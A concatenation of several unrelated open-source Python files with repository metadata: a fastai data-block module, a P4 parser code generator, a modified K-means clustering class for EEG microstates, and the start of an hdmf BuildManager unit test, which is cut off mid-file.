9a6ca649d8a566f6583341846bad76528c2c8f19 | 7,418 | py | Python | dev_course/dl2/exp/nb_08.py | nebgor/fastai_docs | 9daa76023b701df07557332ef5e37d12f6e78828 | ["Apache-2.0"] | stars: null | issues: null | forks: null
#################################################
### THIS FILE WAS AUTOGENERATED! DO NOT EDIT! ###
#################################################
# file to edit: dev_nb/08_data_block.ipynb
from exp.nb_07 import *
import PIL,os,mimetypes
Path.ls = lambda x: list(x.iterdir())
image_extensions = set(k for k,v in mimetypes.types_map.items() if v.startswith('image/'))
def setify(o): return o if isinstance(o,set) else set(listify(o))
def _get_files(parent, p, fs, extensions=None):
p = Path(p)
extensions = setify(extensions)
low_extensions = [e.lower() for e in extensions]
res = [p/f for f in fs if not f.startswith('.')
and ((not extensions) or f'.{f.split(".")[-1].lower()}' in low_extensions)]
return res
def get_files(path, extensions=None, recurse=False, include=None):
path = Path(path)
extensions = setify(extensions)
if recurse:
res = []
for p,d,f in os.walk(path): # returns (dirpath, dirnames, filenames)
if include is not None: d[:] = [o for o in d if o in include]
else: d[:] = [o for o in d if not o.startswith('.')]
res += _get_files(path, p, f, extensions)
return res
else:
f = [o.name for o in os.scandir(path) if o.is_file()]
return _get_files(path, path, f, extensions)
def compose(x, funcs, *args, order_key='_order', **kwargs):
key = lambda o: getattr(o, order_key, 0)
for f in sorted(listify(funcs), key=key): x = f(x, **kwargs)
return x
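# A minimal illustration of how compose() orders functions by `_order`
# (hypothetical transforms; a sketch, not from the notebook):
#
#   f1 = lambda x: x + 1; f1._order = 1
#   f0 = lambda x: x * 2; f0._order = 0
#   assert compose(3, [f1, f0]) == 7  # f0 (order 0) runs before f1 (order 1)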
class ItemList(ListContainer):
def __init__(self, items, path='.', tfms=None):
super().__init__(items)
self.path,self.tfms = Path(path),tfms
def __repr__(self): return f'{super().__repr__()}\nPath: {self.path}'
def new(self, items): return self.__class__(items, self.path, tfms=self.tfms)
def get(self, i): return i
def _get(self, i): return compose(self.get(i), self.tfms)
def __getitem__(self, idx):
res = super().__getitem__(idx)
if isinstance(res,list): return [self._get(o) for o in res]
return self._get(res)
class ImageItemList(ItemList):
@classmethod
def from_files(cls, path, extensions=None, recurse=True, include=None, **kwargs):
if extensions is None: extensions = image_extensions
return cls(get_files(path, extensions, recurse=recurse, include=include), path, **kwargs)
def get(self, fn): return PIL.Image.open(fn)
class Transform(): _order=0
class MakeRGB(Transform):
def __call__(self, item): return item.convert('RGB')
def make_rgb(item): return item.convert('RGB')
def grandparent_splitter(fn, valid_name='valid', train_name='train'):
gp = fn.parent.parent.name
return True if gp==valid_name else False if gp==train_name else None
def split_by_func(ds, f):
items = ds.items
mask = [f(o) for o in items]
# `None` values will be filtered out
train = [o for o,m in zip(items,mask) if m==False]
valid = [o for o,m in zip(items,mask) if m==True ]
return train,valid
class SplitData():
def __init__(self, train, valid): self.train,self.valid = train,valid
@property
def path(self): return self.train.path
@classmethod
def split_by_func(cls, il, f):
lists = map(il.new, split_by_func(il, f))
return cls(*lists)
def __repr__(self): return f'{self.__class__.__name__}\nTrain: {self.train}\nValid: {self.valid}\n'
from collections import OrderedDict
def uniqueify(x, sort=False):
res = list(OrderedDict.fromkeys(x).keys())
if sort: res.sort()
return res
class Processor():
def process(self, items): return items
class CategoryProcessor(Processor):
def __init__(self): self.vocab=None
def proc1(self, item): return self.otoi[item]
def deproc1(self, idx): return self.vocab[idx]
def process(self, items):
if self.vocab is None:
self.vocab = uniqueify(items)
self.otoi = {v:k for k,v in enumerate(self.vocab)}
return [self.proc1(o) for o in items]
def deprocess(self, idxs):
assert self.vocab is not None
return [self.deproc1(idx) for idx in idxs]
class ProcessedItemList(ListContainer):
def __init__(self, inputs, processor):
self.processor = processor
items = processor.process(inputs)
super().__init__(items)
def obj(self, idx):
res = self[idx]
if isinstance(res,(tuple,list,Generator)): return self.processor.deprocess(res)
return self.processor.deproc1(idx)
def parent_labeler(fn): return fn.parent.name
def _label_by_func(ds, f): return [f(o) for o in ds.items]
class LabeledData():
def __init__(self, x, y): self.x,self.y = x,y
def __repr__(self): return f'{self.__class__.__name__}\nx: {self.x}\ny: {self.y}\n'
def __getitem__(self,idx): return self.x[idx],self.y[idx]
def __len__(self): return len(self.x)
@classmethod
def label_by_func(cls, sd, f, proc=None):
labels = _label_by_func(sd, f)
proc_labels = ProcessedItemList(labels, proc)
return cls(sd, proc_labels)
def label_by_func(sd, f):
proc = CategoryProcessor()
train = LabeledData.label_by_func(sd.train, f, proc)
valid = LabeledData.label_by_func(sd.valid, f, proc)
return SplitData(train,valid)
class ResizeFixed(Transform):
_order=10
def __init__(self,size):
if isinstance(size,int): size=(size,size)
self.size = size
def __call__(self, item): return item.resize(self.size, PIL.Image.BILINEAR)
def to_byte_tensor(item):
res = torch.ByteTensor(torch.ByteStorage.from_buffer(item.tobytes()))
w,h = item.size
return res.view(h,w,-1).permute(2,0,1)
to_byte_tensor._order=20
def to_float_tensor(item): return item.float().div_(255.)
to_float_tensor._order=30
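# Typical wiring of the pieces above on an imagenette-style folder tree
# (placeholder path; `partial` comes from functools via the star-imports;
# a sketch, not from the notebook):
#
#   tfms = [make_rgb, ResizeFixed(128), to_byte_tensor, to_float_tensor]
#   il = ImageItemList.from_files(path, tfms=tfms)
#   sd = SplitData.split_by_func(il, partial(grandparent_splitter, valid_name='val'))
#   ll = label_by_func(sd, parent_labeler)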
def show_image(im, figsize=(3,3)):
plt.figure(figsize=figsize)
plt.axis('off')
plt.imshow(im.permute(1,2,0))
class DataBunch():
def __init__(self, train_dl, valid_dl, c_in=None, c_out=None):
self.train_dl,self.valid_dl,self.c_in,self.c_out = train_dl,valid_dl,c_in,c_out
@property
def train_ds(self): return self.train_dl.dataset
@property
def valid_ds(self): return self.valid_dl.dataset
def normalize_chan(x, mean, std):
return (x-mean[...,None,None]) / std[...,None,None]
_m = tensor([0.47, 0.48, 0.45])
_s = tensor([0.29, 0.28, 0.30])
norm_imagenette = partial(normalize_chan, mean=_m.cuda(), std=_s.cuda())
import math
def next_pow_2(x): return 2**math.ceil(math.log2(x))
def get_cnn_layers(data, nfs, layer, **kwargs):
def f(ni, nf, stride=2): return layer(ni, nf, 3, stride=stride, **kwargs)
l1 = data.c_in
l2 = next_pow_2(l1*2)
layers = [f(l1 , l2 , stride=1),
f(l2 , l2*2, stride=1),
f(l2*2, l2*4, stride=1)]
nfs = [l2*4] + nfs
layers += [f(nfs[i], nfs[i+1]) for i in range(len(nfs)-1)]
layers += [nn.AdaptiveAvgPool2d(1), Lambda(flatten),
nn.Linear(nfs[-1], data.c_out),
nn.BatchNorm1d(data.c_out)]
return layers
def get_cnn_model(data, nfs, layer, **kwargs):
return nn.Sequential(*get_cnn_layers(data, nfs, layer, **kwargs))
def get_learn_run(nfs, data, lr, layer, cbs=None, opt_func=None, **kwargs):
model = get_cnn_model(data, nfs, layer, **kwargs)
init_cnn(model)
    return get_runner(model, data, lr=lr, cbs=cbs, opt_func=opt_func)
| 33.718182 | 103 | 0.644918 |
8dcf763c5f4437b43b08d5240f2ee2ba01255c54 | 33 | py | Python | helper.py | SreyaKamineni/cs3240-labdemo | 8a31ef331e4784f30a9d9da8f089c024d30409b4 | ["MIT"] | stars: null | issues: null | forks: null
def greetings(msg):
    print(msg)
| 11 | 19 | 0.69697 |
adb90d66963ebe687f2d029c6d677c8b2a36c446 | 10,360 | py | Python | build/util/desugared_compiler/parser.c.desugared.py | Anmol-007/l2l3_ACL_cartesian_product | 730f07f2c7ff4cdcd482a25491d8bd3883c835e1 | ["Apache-2.0"] | stars: null | issues: null | forks: null
# Copyright 2016 Eotvos Lorand University, Budapest, Hungary
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import p4_hlir.hlir.p4 as p4
from utils.hlir import *
from utils.misc import addError, addWarning
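# NOTE: this "desugared" module is executed by the compiler driver, which is
# expected to provide `hlir` (the parsed P4 program) and to collect the
# module-level `generated_code` string; neither name is defined in this file.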
def format_state(state):
generated_code = ""
if isinstance(state, p4.p4_parse_state):
generated_code += " return parse_state_" + str(state.name) + "(pd, buf, tables);// sugar@21\n"
elif isinstance(state, p4.p4_parser_exception):
print "Parser exceptions are not supported yet."
else: #Control function (parsing is finished)
generated_code += " {// sugar@25\n"
generated_code += " if(verify_packet(pd)) p4_pe_checksum(pd);// sugar@26\n"
generated_code += " " + str(format_p4_node(state)) + "// sugar@27\n"
generated_code += " }// sugar@28\n"
return generated_code
def get_key_byte_width(branch_on):
"""
:param branch_on: list of union(p4_field, tuple)
:rtype: int
"""
key_width = 0
for switch_ref in branch_on:
if type(switch_ref) is p4.p4_field:
if not is_vwf(switch_ref): #Variable width field in parser return select statement is not supported
key_width += (switch_ref.width+7)/8
elif type(switch_ref) is tuple:
key_width += max(4, (switch_ref[1] + 7) / 8)
return key_width
pe_dict = { "p4_pe_index_out_of_bounds" : None,
"p4_pe_out_of_packet" : None,
"p4_pe_header_too_long" : None,
"p4_pe_header_too_short" : None,
"p4_pe_unhandled_select" : None,
"p4_pe_checksum" : None,
"p4_pe_default" : None }
pe_default = p4.p4_parser_exception(None, None)
pe_default.name = "p4_pe_default"
pe_default.return_or_drop = p4.P4_PARSER_DROP
for pe_name, pe in pe_dict.items():
pe_dict[pe_name] = pe_default
for pe_name, pe in hlir.p4_parser_exceptions.items():
pe_dict[pe_name] = pe
generated_code += " #include \"dpdk_lib.h\"// sugar@62\n"
generated_code += " #include \"actions.h\" // apply_table_* and action_code_*// sugar@63\n"
generated_code += "\n"
generated_code += " extern int verify_packet(packet_descriptor_t* pd);// sugar@65\n"
generated_code += "\n"
generated_code += " void print_mac(uint8_t* v) { printf(\"%02hhX:%02hhX:%02hhX:%02hhX:%02hhX:%02hhX\\n\", v[0], v[1], v[2], v[3], v[4], v[5]); }// sugar@67\n"
generated_code += " void print_ip(uint8_t* v) { printf(\"%d.%d.%d.%d\\n\",v[0],v[1],v[2],v[3]); }// sugar@68\n"
generated_code += " \n"
for pe_name, pe in pe_dict.items():
generated_code += " static inline void " + str(pe_name) + "(packet_descriptor_t *pd) {// sugar@72\n"
if pe.return_or_drop == p4.P4_PARSER_DROP:
generated_code += " pd->dropped = 1;// sugar@74\n"
else:
format_p4_node(pe.return_or_drop)
generated_code += " }// sugar@77\n"
for hi_name, hi in hlir.p4_header_instances.items():
hi_prefix = hdr_prefix(hi.name)
generated_code += " static void// sugar@81\n"
generated_code += " extract_header_" + str(hi) + "(uint8_t* buf, packet_descriptor_t* pd) {// sugar@82\n"
generated_code += " pd->headers[" + str(hi_prefix) + "].pointer = buf;// sugar@83\n"
if isinstance(hi.header_type.length, p4.p4_expression):
generated_code += " uint32_t hdr_length = " + str(format_expr(resolve_field_ref(hlir, hi, hi.header_type.length))) + ";// sugar@85\n"
generated_code += " pd->headers[" + str(hi_prefix) + "].length = hdr_length;// sugar@86\n"
generated_code += " pd->headers[" + str(hi_prefix) + "].var_width_field_bitwidth = hdr_length * 8 - " + str(sum([f[1] if f[1] != p4.P4_AUTO_WIDTH else 0 for f in hi.header_type.layout.items()])) + ";// sugar@87\n"
generated_code += " if(hdr_length > " + str(hi.header_type.max_length) + ") //TODO: is this the correct place for the check// sugar@88\n"
generated_code += " p4_pe_header_too_long(pd);// sugar@89\n"
generated_code += " }// sugar@90\n"
generated_code += " \n"
for state_name, parse_state in hlir.p4_parse_states.items():
generated_code += " static void parse_state_" + str(state_name) + "(packet_descriptor_t* pd, uint8_t* buf, lookup_table_t** tables);// sugar@94\n"
generated_code += "\n"
for state_name, parse_state in hlir.p4_parse_states.items():
branch_on = parse_state.branch_on
if branch_on:
generated_code += " static inline void build_key_" + str(state_name) + "(packet_descriptor_t *pd, uint8_t *buf, uint8_t *key) {// sugar@100\n"
for switch_ref in branch_on:
if type(switch_ref) is p4.p4_field:
field_instance = switch_ref
if is_vwf(field_instance):
addError("generating build_key_" + state_name, "Variable width field '" + str(field_instance) + "' in parser '" + state_name + "' return select statement is not supported")
else:
byte_width = (field_instance.width + 7) / 8
if byte_width <= 4:
generated_code += " EXTRACT_INT32_BITS(pd, " + str(fld_id(field_instance)) + ", *(uint32_t*)key)// sugar@109\n"
generated_code += " key += sizeof(uint32_t);// sugar@110\n"
else:
generated_code += " EXTRACT_BYTEBUF(pd, " + str(fld_id(field_instance)) + ", key)// sugar@112\n"
generated_code += " key += " + str(byte_width) + ";// sugar@113\n"
elif type(switch_ref) is tuple:
generated_code += " uint8_t* ptr;// sugar@115\n"
offset, width = switch_ref
# TODO
addError("generating parse state %s"%state_name, "current() calls are not supported yet")
generated_code += " }// sugar@119\n"
for state_name, parse_state in hlir.p4_parse_states.items():
generated_code += " static void parse_state_" + str(state_name) + "(packet_descriptor_t* pd, uint8_t* buf, lookup_table_t** tables)// sugar@122\n"
generated_code += " {// sugar@123\n"
generated_code += " uint32_t value32;// sugar@124\n"
generated_code += " (void)value32;// sugar@125\n"
for call in parse_state.call_sequence:
if call[0] == p4.parse_call.extract:
hi = call[1]
generated_code += " extract_header_" + str(hi) + "(buf, pd);// sugar@130\n"
generated_code += " buf += pd->headers[" + str(hdr_prefix(hi.name)) + "].length;// sugar@131\n"
for f in hi.fields:
if parsed_field(hlir, f):
if f.width <= 32:
generated_code += " EXTRACT_INT32_AUTO(pd, " + str(fld_id(f)) + ", value32)// sugar@135\n"
generated_code += " pd->fields." + str(fld_id(f)) + " = value32;// sugar@136\n"
generated_code += " pd->fields.attr_" + str(fld_id(f)) + " = 0;// sugar@137\n"
elif call[0] == p4.parse_call.set:
dest_field, src = call[1], call[2]
if type(src) is int or type(src) is long:
hex(src)
# TODO
elif type(src) is p4.p4_field:
src
# TODO
elif type(src) is tuple:
offset, width = src
# TODO
addError("generating parse state %s"%state_name, "set_metadata during parsing is not supported yet")
branch_on = parse_state.branch_on
if not branch_on:
branch_case, next_state = parse_state.branch_to.items()[0]
generated_code += " " + str(format_state(next_state)) + "// sugar@154\n"
else:
key_byte_width = get_key_byte_width(branch_on)
generated_code += " uint8_t key[" + str(key_byte_width) + "];// sugar@157\n"
generated_code += " build_key_" + str(state_name) + "(pd, buf, key);// sugar@158\n"
has_default_case = False
for case_num, case in enumerate(parse_state.branch_to.items()):
branch_case, next_state = case
mask_name = "mask_value_%d" % case_num
value_name = "case_value_%d" % case_num
if branch_case == p4.P4_DEFAULT:
has_default_case = True
generated_code += " " + str(format_state(next_state)) + "// sugar@166\n"
continue
if type(branch_case) is int:
value = branch_case
value_len, l = int_to_big_endian_byte_array(value)
generated_code += " uint8_t " + str(value_name) + "[" + str(value_len) + "] = {// sugar@171\n"
for c in l:
generated_code += " " + str(c) + ",// sugar@173\n"
generated_code += " };// sugar@174\n"
generated_code += " if ( memcmp(key, " + str(value_name) + ", " + str(value_len) + ") == 0)// sugar@175\n"
generated_code += " " + str(format_state(next_state)) + "// sugar@176\n"
elif type(branch_case) is tuple:
value = branch_case[0]
mask = branch_case[1]
# TODO
addError("generating parse state %s"%state_name, "value masking is not supported yet")
elif type(branch_case) is p4.p4_parse_value_set:
value_set = branch_case
# TODO
addError("generating parse state %s"%state_name, "value sets are not supported yet")
continue
if not has_default_case:
generated_code += " return NULL;// sugar@188\n"
generated_code += " }// sugar@189\n"
generated_code += " \n"
generated_code += " void parse_packet(packet_descriptor_t* pd, lookup_table_t** tables) {// sugar@192\n"
generated_code += " parse_state_start(pd, pd->data, tables);// sugar@193\n"
generated_code += " }// sugar@194\n"
| 53.402062 | 225 | 0.60222 |
6030598e6a8abed013a11b643c449b8380c1e557 | 13,900 | py | Python | pycrostates/cluster/kmeans.py | mscheltienne/pycrostates | be87adf69c94b2b179064f337acd8a49d01c305d | ["BSD-3-Clause"] | stars: 1 (2021-12-14 .. 2021-12-14) | issues: null | forks: null
"""Class and functions to use modified Kmeans."""
from pathlib import Path
from typing import Optional, Tuple, Union
import numpy as np
from mne import BaseEpochs
from mne.io import BaseRaw
from mne.parallel import parallel_func
from numpy.random import Generator, RandomState
from numpy.typing import NDArray
from ..utils import _corr_vectors
from ..utils._checks import _check_random_state, _check_type
from ..utils._docs import copy_doc, fill_doc
from ..utils._logs import _set_verbose, logger
from ._base import _BaseCluster
@fill_doc
class ModKMeans(_BaseCluster):
"""
Modified K-Means clustering algorithms.
Parameters
----------
n_clusters : int
The number of clusters to form as well as the number of centroids to
generate.
n_init : int
Number of time the k-means algorithm is run with different centroid
seeds. The final result will be the run with highest global explained
variance.
max_iter : int
Maximum number of iterations of the k-means algorithm for a single run.
tol : float
        Relative tolerance with regards to the estimated residual noise in the
        cluster centers of two consecutive iterations to declare convergence.
    %(random_state)s
    """
def __init__(
self,
n_clusters: int,
n_init: int = 100,
max_iter: int = 300,
tol: Union[int, float] = 1e-6,
random_state: Optional[Union[int, RandomState, Generator]] = None,
):
super().__init__()
# k-means has a fix number of clusters defined at init
self._n_clusters = _BaseCluster._check_n_clusters(n_clusters)
self._cluster_names = [str(k) for k in range(self.n_clusters)]
# k-means settings
self._n_init = ModKMeans._check_n_init(n_init)
self._max_iter = ModKMeans._check_max_iter(max_iter)
self._tol = ModKMeans._check_tol(tol)
self._random_state = _check_random_state(random_state)
# fit variables
self._GEV_ = None
def _repr_html_(self, caption=None):
from ..html_templates import repr_templates_env
template = repr_templates_env.get_template("ModKMeans.html.jinja")
if self.fitted:
n_samples = self._fitted_data.shape[-1]
ch_types, ch_counts = np.unique(
self.get_channel_types(), return_counts=True
)
ch_repr = [
f"{ch_count} {ch_type.upper()}"
for ch_type, ch_count in zip(ch_types, ch_counts)
]
GEV = int(self._GEV_ * 100)
else:
n_samples = None
ch_repr = None
GEV = None
return template.render(
name=self.__class__.__name__,
n_clusters=self._n_clusters,
n_init=self._n_init,
GEV=GEV,
cluster_names=self._cluster_names,
fitted=self._fitted,
n_samples=n_samples,
ch_repr=ch_repr,
)
@copy_doc(_BaseCluster.__eq__)
def __eq__(self, other):
if isinstance(other, ModKMeans):
if not super().__eq__(other):
return False
attributes = (
"_n_init",
"_max_iter",
"_tol",
# '_random_state',
# TODO: think about comparison and I/O for random states
"_GEV_",
)
for attribute in attributes:
try:
attr1 = self.__getattribute__(attribute)
attr2 = other.__getattribute__(attribute)
except AttributeError:
return False
if attr1 != attr2:
return False
return True
return False
@copy_doc(_BaseCluster.__ne__)
def __ne__(self, other):
return not self.__eq__(other)
@copy_doc(_BaseCluster._check_fit)
def _check_fit(self):
super()._check_fit()
# sanity-check
assert self.GEV_ is not None
@copy_doc(_BaseCluster.fit)
@fill_doc
def fit(
self,
inst: Union[BaseRaw, BaseEpochs],
picks: Union[str, NDArray[int]] = "eeg",
tmin: Optional[Union[int, float]] = None,
tmax: Optional[Union[int, float]] = None,
reject_by_annotation: bool = True,
n_jobs: int = 1,
*,
verbose: Optional[str] = None,
) -> NDArray[float]:
"""
%(verbose)s
"""
_set_verbose(verbose) # TODO: decorator nesting is failing
data = super().fit(
inst, picks, tmin, tmax, reject_by_annotation, n_jobs
)
inits = self._random_state.randint(
low=0, high=100 * self._n_init, size=(self._n_init)
)
if n_jobs == 1:
best_gev, best_maps, best_segmentation = None, None, None
count_converged = 0
for init in inits:
gev, maps, segmentation, converged = ModKMeans._kmeans(
data, self._n_clusters, self._max_iter, init, self._tol
)
if not converged:
continue
if best_gev is None or gev > best_gev:
best_gev, best_maps, best_segmentation = (
gev,
maps,
segmentation,
)
count_converged += 1
else:
parallel, p_fun, _ = parallel_func(
ModKMeans._kmeans, n_jobs, total=self._n_init
)
runs = parallel(
p_fun(data, self._n_clusters, self._max_iter, init, self._tol)
for init in inits
)
try:
best_run = np.nanargmax(
[run[0] if run[3] else np.nan for run in runs]
)
best_gev, best_maps, best_segmentation, _ = runs[best_run]
count_converged = sum(run[3] for run in runs)
except ValueError:
best_gev, best_maps, best_segmentation = None, None, None
count_converged = 0
if best_gev is not None:
logger.info(
"Selecting run with highest GEV = %.2f%% after %i/%i "
"iterations converged.",
best_gev * 100,
count_converged,
self._n_init,
)
else:
logger.error(
"All the K-means run failed to converge. Please adapt the "
"tolerance and the maximum number of iteration."
)
self.fitted = False # reset variables related to fit
return # break early
self._GEV_ = best_gev
self._cluster_centers_ = best_maps
self._labels_ = best_segmentation
self._fitted = True
@copy_doc(_BaseCluster.save)
def save(self, fname: Union[str, Path]):
super().save(fname)
# TODO: to be replaced by a general writer than infers the writer from
# the file extension.
from ..io.fiff import _write_cluster
_write_cluster(
fname,
self._cluster_centers_,
self._info,
"ModKMeans",
self._cluster_names,
self._fitted_data,
self._labels_,
n_init=self._n_init,
max_iter=self._max_iter,
tol=self._tol,
GEV_=self._GEV_,
)
# --------------------------------------------------------------------
@staticmethod
def _kmeans(
data: NDArray[float],
n_clusters: int,
max_iter: int,
random_state: Union[RandomState, Generator],
tol: Union[int, float],
) -> Tuple[float, NDArray[float], NDArray[int], bool]:
"""Run the k-means algorithm."""
gfp_sum_sq = np.sum(data**2)
maps, converged = ModKMeans._compute_maps(
data, n_clusters, max_iter, random_state, tol
)
activation = maps.dot(data)
segmentation = np.argmax(np.abs(activation), axis=0)
map_corr = _corr_vectors(data, maps[segmentation].T)
gev = np.sum((data * map_corr) ** 2) / gfp_sum_sq
return gev, maps, segmentation, converged
@staticmethod
def _compute_maps(
data: NDArray[float],
n_clusters: int,
max_iter: int,
random_state: Union[RandomState, Generator],
tol: Union[int, float],
) -> Tuple[NDArray[float], bool]:
"""
Compute microstates maps.
Based on mne_microstates by Marijn van Vliet <w.m.vanvliet@gmail.com>
https://github.com/wmvanvliet/mne_microstates/blob/master/microstates.py
"""
# TODO: Does this work if the RandomState is a generator?
if not isinstance(random_state, np.random.RandomState):
random_state = np.random.RandomState(random_state)
# ------------------------- handle zeros maps -------------------------
# zero map can be due to non data in the recording, it's unlikely that
# all channels recorded the same value at the same time (=0 due to
# average reference)
# ---------------------------------------------------------------------
data = data[:, np.linalg.norm(data.T, axis=1) != 0]
n_channels, n_samples = data.shape
data_sum_sq = np.sum(data**2)
# Select random time points for our initial topographic maps
init_times = random_state.choice(
n_samples, size=n_clusters, replace=False
)
maps = data[:, init_times].T
# Normalize the maps
maps /= np.linalg.norm(maps, axis=1, keepdims=True)
prev_residual = np.inf
for _ in range(max_iter):
# Assign each sample to the best matching microstate
activation = maps.dot(data)
segmentation = np.argmax(np.abs(activation), axis=0)
# Recompute the topographic maps of the microstates, based on the
# samples that were assigned to each state.
for state in range(n_clusters):
idx = segmentation == state
if np.sum(idx) == 0:
maps[state] = 0
continue
# Find largest eigenvector
maps[state] = data[:, idx].dot(activation[state, idx])
maps[state] /= np.linalg.norm(maps[state])
# Estimate residual noise
act_sum_sq = np.sum(
np.sum(maps[segmentation].T * data, axis=0) ** 2
)
residual = abs(data_sum_sq - act_sum_sq)
residual /= float(n_samples * (n_channels - 1))
# check convergence
if (prev_residual - residual) < (tol * residual):
converged = True
break
prev_residual = residual
else:
converged = False
return maps, converged
# --------------------------------------------------------------------
@property
def n_init(self) -> int: # noqa: D401
"""
        Number of k-means runs with different centroid seeds.
:type: `int`
"""
return self._n_init
@property
def max_iter(self) -> int:
"""
Maximum number of iterations of the k-means algorithm for a single run.
:type: `int`
"""
return self._max_iter
@property
def tol(self) -> Union[int, float]:
"""
Relative tolerance.
:type: `float`
"""
return self._tol
@property
def random_state(self) -> Union[RandomState, Generator]:
"""
Random state.
:type: `~numpy.random.RandomState` | `~numpy.random.Generator`
"""
return self._random_state
@property
def GEV_(self) -> float:
"""
GEV_ fit variable.
:type: `float`
"""
if self._GEV_ is None:
assert not self._fitted # sanity-check
logger.warning("Clustering algorithm has not been fitted.")
return self._GEV_
@_BaseCluster.fitted.setter
@copy_doc(_BaseCluster.fitted.setter)
def fitted(self, fitted):
super(self.__class__, self.__class__).fitted.__set__(self, fitted)
if not fitted:
self._GEV_ = None
# --------------------------------------------------------------------
# ---------------
# For now, check function are defined as static within KMeans. If they are
# used outside KMeans, they should be moved to regular function in _base.py
# ---------------
@staticmethod
def _check_n_init(n_init: int) -> int:
"""Check that n_init is a positive integer."""
_check_type(n_init, ("int",), item_name="n_init")
if n_init <= 0:
raise ValueError(
"The number of initialization must be a positive integer. "
f"Provided: '{n_init}'."
)
return n_init
@staticmethod
def _check_max_iter(max_iter: int) -> int:
"""Check that max_iter is a positive integer."""
_check_type(max_iter, ("int",), item_name="max_iter")
if max_iter <= 0:
raise ValueError(
"The number of max iteration must be a positive integer. "
f"Provided: '{max_iter}'."
)
return max_iter
@staticmethod
def _check_tol(tol: Union[int, float]) -> Union[int, float]:
"""Check that tol is a positive number."""
_check_type(tol, ("numeric",), item_name="tol")
if tol <= 0:
raise ValueError(
"The tolerance must be a positive number. "
f"Provided: '{tol}'."
)
return tol
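# Illustrative use of the checkers above (assuming the enclosing class is
# the KMeans mentioned in the comment block above):
#
#     KMeans._check_n_init(5)       # -> 5
#     KMeans._check_max_iter(100)   # -> 100
#     KMeans._check_tol(1e-8)       # -> 1e-8
#     KMeans._check_n_init(0)       # raises ValueError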
| 33.174224 | 80 | 0.547482 |
ca5aa7f5713e60b3f34f2982e0b31931e7734451 | 14,415 | py | Python | tests/unit/build_tests/test_io_manager.py | satra/hdmf | fab5660b1e009151980939e266e63a6c408064aa | ["BSD-3-Clause-LBNL"] | null | null | null | tests/unit/build_tests/test_io_manager.py | satra/hdmf | fab5660b1e009151980939e266e63a6c408064aa | ["BSD-3-Clause-LBNL"] | null | null | null | tests/unit/build_tests/test_io_manager.py | satra/hdmf | fab5660b1e009151980939e266e63a6c408064aa | ["BSD-3-Clause-LBNL"] | null | null | null |
import re
from hdmf.build import GroupBuilder, DatasetBuilder, ObjectMapper, BuildManager, TypeMap, ContainerConfigurationError
from hdmf.spec import GroupSpec, AttributeSpec, DatasetSpec, SpecCatalog, SpecNamespace, NamespaceCatalog
from hdmf.spec.spec import ZERO_OR_MANY
from hdmf.testing import TestCase
from abc import ABCMeta, abstractmethod
from tests.unit.utils import Foo, FooBucket, CORE_NAMESPACE
class FooMapper(ObjectMapper):
"""Maps nested 'attr2' attribute on dataset 'my_data' to Foo.attr2 in constructor and attribute map
"""
def __init__(self, spec):
super().__init__(spec)
my_data_spec = spec.get_dataset('my_data')
self.map_spec('attr2', my_data_spec.get_attribute('attr2'))
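# Illustrative effect of the extra mapping above (hypothetical values):
# building Foo('f', [0, 1, 2], 'v1', 10) writes 10 onto the nested dataset
# attribute, i.e. builder['my_data'].attributes['attr2'], rather than onto
# the group itself.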
class TestBase(TestCase):
def setUp(self):
self.foo_spec = GroupSpec(
doc='A test group specification with a data type',
data_type_def='Foo',
datasets=[
DatasetSpec(
doc='an example dataset',
dtype='int',
name='my_data',
attributes=[
AttributeSpec(
name='attr2',
doc='an example integer attribute',
dtype='int'
)
]
)
],
attributes=[AttributeSpec('attr1', 'an example string attribute', 'text')]
)
self.spec_catalog = SpecCatalog()
self.spec_catalog.register_spec(self.foo_spec, 'test.yaml')
self.namespace = SpecNamespace(
'a test namespace',
CORE_NAMESPACE,
[{'source': 'test.yaml'}],
version='0.1.0',
catalog=self.spec_catalog)
self.namespace_catalog = NamespaceCatalog()
self.namespace_catalog.add_namespace(CORE_NAMESPACE, self.namespace)
self.type_map = TypeMap(self.namespace_catalog)
self.type_map.register_container_type(CORE_NAMESPACE, 'Foo', Foo)
self.type_map.register_map(Foo, FooMapper)
self.manager = BuildManager(self.type_map)
class TestBuildManager(TestBase):
def test_build(self):
container_inst = Foo('my_foo', list(range(10)), 'value1', 10)
expected = GroupBuilder(
'my_foo',
datasets={
'my_data':
DatasetBuilder(
'my_data',
list(range(10)),
attributes={'attr2': 10})},
attributes={'attr1': 'value1', 'namespace': CORE_NAMESPACE, 'data_type': 'Foo',
'object_id': container_inst.object_id})
builder1 = self.manager.build(container_inst)
self.assertDictEqual(builder1, expected)
def test_build_memoization(self):
container_inst = Foo('my_foo', list(range(10)), 'value1', 10)
expected = GroupBuilder(
'my_foo',
datasets={
'my_data': DatasetBuilder(
'my_data',
list(range(10)),
attributes={'attr2': 10})},
attributes={'attr1': 'value1', 'namespace': CORE_NAMESPACE, 'data_type': 'Foo',
'object_id': container_inst.object_id})
builder1 = self.manager.build(container_inst)
builder2 = self.manager.build(container_inst)
self.assertDictEqual(builder1, expected)
self.assertIs(builder1, builder2)
def test_construct(self):
builder = GroupBuilder(
'my_foo',
datasets={
'my_data': DatasetBuilder(
'my_data',
list(range(10)),
attributes={'attr2': 10})},
attributes={'attr1': 'value1', 'namespace': CORE_NAMESPACE, 'data_type': 'Foo',
'object_id': -1})
container = self.manager.construct(builder)
self.assertListEqual(container.my_data, list(range(10)))
self.assertEqual(container.attr1, 'value1')
self.assertEqual(container.attr2, 10)
def test_construct_memoization(self):
builder = GroupBuilder(
'my_foo', datasets={'my_data': DatasetBuilder(
'my_data',
list(range(10)),
attributes={'attr2': 10})},
attributes={'attr1': 'value1', 'namespace': CORE_NAMESPACE, 'data_type': 'Foo',
'object_id': -1})
container1 = self.manager.construct(builder)
container2 = self.manager.construct(builder)
self.assertIs(container1, container2)
class NestedBaseMixin(metaclass=ABCMeta):
def setUp(self):
super().setUp()
self.foo_bucket = FooBucket('test_foo_bucket', [
Foo('my_foo1', list(range(10)), 'value1', 10),
Foo('my_foo2', list(range(10, 20)), 'value2', 20)])
self.foo_builders = {
'my_foo1': GroupBuilder('my_foo1',
datasets={'my_data': DatasetBuilder(
'my_data',
list(range(10)),
attributes={'attr2': 10})},
attributes={'attr1': 'value1', 'namespace': CORE_NAMESPACE, 'data_type': 'Foo',
